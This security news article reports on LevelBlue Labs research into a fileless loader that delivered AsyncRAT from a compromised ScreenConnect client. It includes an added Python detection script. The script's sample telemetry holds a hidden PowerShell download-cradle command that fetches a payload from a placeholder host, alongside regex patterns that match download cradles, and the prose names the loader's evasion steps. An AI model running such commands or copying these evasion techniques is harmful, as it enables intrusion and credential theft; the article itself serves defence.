LevelBlue Labs has published new research on a recent attack that used a fileless loader to deliver AsyncRAT, a well-known Remote Access Trojan used for credential theft and remote control of compromised systems.
The investigation found that attackers gained initial access through a compromised ScreenConnect client; SentinelOne detected the process execution that revealed the malicious activity. The connection was routed through relay.shipperzone.online, a domain linked to unauthorised ScreenConnect deployments.
From there, a VBScript named Update.vbs was executed with WScript, which launched PowerShell commands to download two payloads, logs.ldk and logs.ldr, from an external server. Both were written to the public user directory (C:\Users\Public) under extensions that do not look executable, and then loaded and executed entirely in memory rather than run from disk.
LevelBlue Labs’ technical analysis shared with Hackread.com showed the first stage was Obfuscator.dll, a .NET assembly used to launch malicious code, disable security controls, and establish persistence. Its methods included in-memory patching of AMSI (so script content is no longer scanned) and ETW (so the event tracing that Windows logging and EDR sensors rely on goes blind), dynamic API resolution to hinder static detection, and creation of a scheduled task disguised as “Skype Updater.”
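The loader chain described above (ScreenConnect client, WScript running Update.vbs, a PowerShell download cradle, payloads dropped in the public user directory, then a “Skype Updater” scheduled task) is a process-tree pattern rather than a file signature, so it is best caught from endpoint telemetry. The script below is an added detection example written for this article, not code from LevelBlue Labs or from the report. It runs four rules over constructed Sysmon-style records; the PIDs, the ScreenConnect client binary name, the download host 203.0.113.10 and the task action path are assumptions chosen to mirror the chain, and it generalises the last rule to any “updater” task whose action lives outside a trusted root.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not taken from the LevelBlue report). Each dict is a
# flattened Sysmon-style record: "process" ~ Event ID 1, "file" ~ Event ID 11 and
# "task" ~ a scheduled-task registration. The PIDs, the ScreenConnect client
# binary name, the 203.0.113.10 download host and the task action path are
# assumptions chosen to mirror the chain described in the article.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process", "pid": 4120, "ppid": 988,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\Public\Update.vbs"',
     "parent_image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.WindowsClient.exe"},
    {"type": "process", "pid": 4188, "ppid": 4120, "image": PS,
     "cmdline": (r"powershell -w hidden -ep bypass -c $w=New-Object Net.WebClient;"
                 r"$w.DownloadFile('http://203.0.113.10/logs.ldk','C:\Users\Public\logs.ldk')"),
     "parent_image": r"C:\Windows\System32\wscript.exe"},
    {"type": "file", "pid": 4188, "image": PS, "path": r"C:\Users\Public\logs.ldk"},
    {"type": "file", "pid": 4188, "image": PS, "path": r"C:\Users\Public\logs.ldr"},
    {"type": "task", "pid": 4188, "name": "Skype Updater",
     "action": r"C:\Users\Public\logs.ldr"},
    # Benign controls that must stay quiet: a vendor script under Program Files
    # and a genuine updater task whose action lives in a trusted root.
    {"type": "process", "pid": 5000, "ppid": 700,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Program Files\Vendor\maint.vbs"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "task", "pid": 5001, "name": "Vendor Updater",
     "action": r"C:\Program Files\Vendor\update.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Locations an unprivileged user or a RAT can write to without elevation.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(Users\\Public|Users\\[^\\]+\\AppData|Windows\\Temp|ProgramData)\\", re.I)
# Roots a legitimate updater binary would normally live under.
TRUSTED_ROOT = re.compile(r"^[a-z]:\\(Windows|Program Files( \(x86\))?)\\", re.I)
SCRIPT_PATH = re.compile(r'"?([a-z]:\\[^"]+?\.(?:vbs|vbe|js|jse|wsf))"?', re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
    r"net\.webclient|start-bitstransfer|invoke-restmethod", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) findings. Process rules run first so that file
    and task records can be tied back to a PID that is already suspect."""
    findings: List[Tuple[str, int, str]] = []
    suspect: set = set()
    procs = {e["pid"]: e for e in events if e["type"] == "process"}

    for e in (x for x in events if x["type"] == "process"):
        img = basename(e["image"])
        if img in SCRIPT_HOSTS:
            # Rule 1: a script host running a script from a user-writable path.
            m = SCRIPT_PATH.search(e["cmdline"])
            if m and USER_WRITABLE.match(m.group(1)):
                findings.append(("script_host_user_writable_path", e["pid"], m.group(1)))
                suspect.add(e["pid"])
        elif img in POWERSHELL:
            # Rule 2: PowerShell spawned by a script host with a download cradle.
            parent = procs.get(e["ppid"])
            parent_img = basename(parent["image"] if parent else e.get("parent_image", ""))
            if parent_img in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(e["cmdline"]):
                findings.append(("script_host_spawns_ps_downloader", e["pid"], parent_img))
                suspect.add(e["pid"])

    for e in (x for x in events if x["type"] != "process"):
        if e["type"] == "file":
            # Rule 3: a suspect downloader writing into a user-writable directory.
            if e["pid"] in suspect and USER_WRITABLE.match(e["path"]):
                findings.append(("downloader_drops_payload", e["pid"], e["path"]))
        elif e["type"] == "task":
            # Rule 4: task created by a suspect PID, or an "updater" task whose
            # action does not live under Windows or Program Files.
            looks_like_updater = "updat" in e["name"].lower()
            untrusted_action = not TRUSTED_ROOT.match(e["action"])
            if e["pid"] in suspect or (looks_like_updater and untrusted_action):
                findings.append(("masquerading_scheduled_task", e["pid"], e["name"]))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:36} pid={pid} {detail}")
```

Against the constructed records this raises five findings for the malicious chain (PIDs 4120 and 4188) and none for the two benign controls. The same rule bodies map directly onto Sysmon Event ID 1 and 11 fields, or onto a SentinelOne or Sigma process-creation query, which is where a practitioner would actually run them.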
The second stage, AsyncClient.exe, handled command-and-control activity. It decrypted its configuration using AES-256, which revealed its C2 server at 3osch20.duckdns.org (a free dynamic-DNS host) along with infection flags and persistence settings. Communication with the server was maintained over a TCP socket using custom packet formats.
AsyncRAT’s capabilities in this case included reconnaissance of the infected machine, logging of keystrokes, collection of browser data and extensions, and persistence through scheduled tasks. Sensitive data such as user credentials and clipboard contents could be exfiltrated back to the operator.
LevelBlue Labs reports that attackers are now pairing AsyncRAT with fileless loading techniques that sidestep traditional disk-based detection, which means defenders need process, script and memory telemetry rather than file scanning alone. The full report, including indicators of compromise and technical details, is available from LevelBlue Labs.